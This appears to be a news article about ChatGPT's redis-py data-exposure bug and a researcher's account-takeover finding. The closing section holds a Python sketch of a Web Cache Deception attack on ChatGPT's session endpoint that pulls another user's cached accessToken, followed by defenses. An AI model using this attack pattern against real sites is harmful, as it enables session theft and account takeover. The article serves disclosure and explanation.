ChatGPT could not find the vulnerabilities in its own system: how flaws allowed user account takeover and leaked payment data

A flaw in an open-source library caused an outage of the ChatGPT service earlier this week, according to OpenAI’s disclosure. The bug allowed some users to see titles from other active users’ chat histories and, in some instances, the first message of a newly started conversation. As a direct consequence, OpenAI took ChatGPT offline to address the issue. The flaw has been fixed, and the ChatGPT service has been brought back online, along with the conversation history feature, with the exception of the most recent few hours of data.

Nevertheless, after further investigation, OpenAI revealed that the same flaw may have exposed the payment-related information of 1.2% of ChatGPT Plus subscribers to other users. This information consisted of the last four digits of a credit card number, an email address, a payment address, and the card’s expiration date. Full credit card numbers were never exposed.

OpenAI has concluded that the number of people whose data was actually revealed to someone else is very small. To have seen this information, a ChatGPT Plus subscriber would have needed either to open a subscription confirmation email sent on March 20 between 1 a.m. and 10 a.m. Pacific time, or to click “My Account,” then “Change my subscription,” within the same time window.

OpenAI has reached out to the affected users to inform them of the situation and to reassure them that their data is not at any further risk. The company says it places a high priority on the privacy and safety of its users’ data and has expressed regret that it failed to live up to its commitment to protecting customer confidentiality. OpenAI says it is committed to restoring users’ trust and will continue to take steps to improve its processes.

The flaw was found in redis-py, the open-source Redis client library. As soon as OpenAI realized there was a problem, it contacted the Redis maintainers and provided them with a patch. The issue affected the asyncio redis-py client for Redis Cluster and has since been resolved. According to OpenAI’s postmortem, a request cancelled after its command had been sent, but before the reply was read, could leave the shared connection in a corrupted state, so the next request served over that connection could receive cached data belonging to another user.
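To make that failure mode concrete, here is a minimal, hypothetical sketch of how a cancelled async request can leave an unread reply on a shared connection, so the next caller on that connection receives data meant for someone else. It deliberately fakes the connection and the server; it is not redis-py’s actual code, and the key names are illustrative only.

```python
import asyncio

class FakeConnection:
    """Stand-in for a pooled client connection with an in-order reply queue."""
    def __init__(self):
        self.replies = asyncio.Queue()

    async def send_command(self, key):
        # The fake "server" answers every command after a short delay.
        async def respond():
            await asyncio.sleep(0.05)
            await self.replies.put(f"data for {key}")
        asyncio.create_task(respond())

    async def read_reply(self):
        return await self.replies.get()

async def get(conn, key):
    await conn.send_command(key)
    return await conn.read_reply()

async def main():
    conn = FakeConnection()  # one shared connection, as in a pool

    # User A's request is cancelled after the command is sent but before
    # the reply is read, so the reply stays queued on the connection.
    task_a = asyncio.create_task(get(conn, "user-a:chat-titles"))
    await asyncio.sleep(0.01)
    task_a.cancel()
    try:
        await task_a
    except asyncio.CancelledError:
        pass

    # User B reuses the same connection and receives User A's reply.
    print(await get(conn, "user-b:chat-titles"))  # prints "data for user-a:chat-titles"

asyncio.run(main())
```

The underlying remedy is to avoid returning a connection to the pool in this half-used state, for example by discarding or draining it whenever a request is interrupted mid-flight.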

Separately, a security researcher known as Nagali discovered a critical account takeover vulnerability in the OpenAI ChatGPT application. The flaw gave an attacker the ability to take control of another user’s account, view their billing information, and read their chat history without the victim’s knowledge. OpenAI’s team has since patched the issue and thanked the researcher for responsibly disclosing it.

The vulnerability came to light while the researcher was investigating ChatGPT’s authentication flow and noticed unusual behavior in a GET request that fetched the account context from the server, including the researcher’s email address, name, picture, and accessToken. Because that sensitive response was reachable this way, the researcher was able to exploit it through “Web Cache Deception.”
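For illustration, an authenticated account-context fetch of this kind might look roughly like the sketch below. The endpoint path, cookie name, and response fields are assumptions made for the example, not the exact request the researcher described.

```python
import requests

# Hypothetical reconstruction of the authenticated "account context" fetch.
# The path, cookie name, and response fields here are illustrative assumptions.
session = requests.Session()
session.cookies.set("__Secure-next-auth.session-token", "<the user's session cookie>")

resp = session.get("https://chat.openai.com/api/auth/session")
data = resp.json()

# A response of this shape would contain everything needed to act as the user,
# for example:
#   {"user": {"name": "...", "email": "...", "picture": "..."},
#    "accessToken": "eyJhbGciOi..."}
print(data.get("accessToken"))
```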

“Web Cache Deception” is a vulnerability that lets an attacker manipulate web cache servers into storing sensitive information in a cached response. By crafting a request with a modified file extension, an attacker can trick the cache server into storing sensitive data and then retrieve it later, gaining access to another user’s information.
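The sketch below shows how such an attack could be mounted against a session endpoint in principle. The poisoned path, the “.css” caching rule, and the response fields are assumptions chosen to illustrate the technique, not the confirmed details of the ChatGPT finding.

```python
import requests

BASE = "https://chat.openai.com"

# 1. The attacker sends the victim a link to an authenticated endpoint with a
#    static-looking suffix appended. Many CDN rules cache any URL ending in
#    ".css" regardless of the response's Content-Type.
poisoned_path = "/api/auth/session/anything.css"   # hypothetical path

# 2. When the victim opens the link while logged in, the application server
#    ignores the extra path segment and returns the victim's session JSON
#    (email, name, picture, accessToken), which the cache now stores under
#    the ".css" URL.

# 3. The attacker then requests the same URL with no cookies at all and, if
#    the cache was deceived, receives the victim's cached session data.
resp = requests.get(BASE + poisoned_path)
if "accessToken" in resp.text:
    stolen = resp.json()
    print("cache served another user's session:", stolen.get("user", {}).get("email"))
```

Typical defenses are to mark authenticated responses as non-cacheable (and have the cache respect that) and to return an error for unexpected path suffixes instead of echoing the session data.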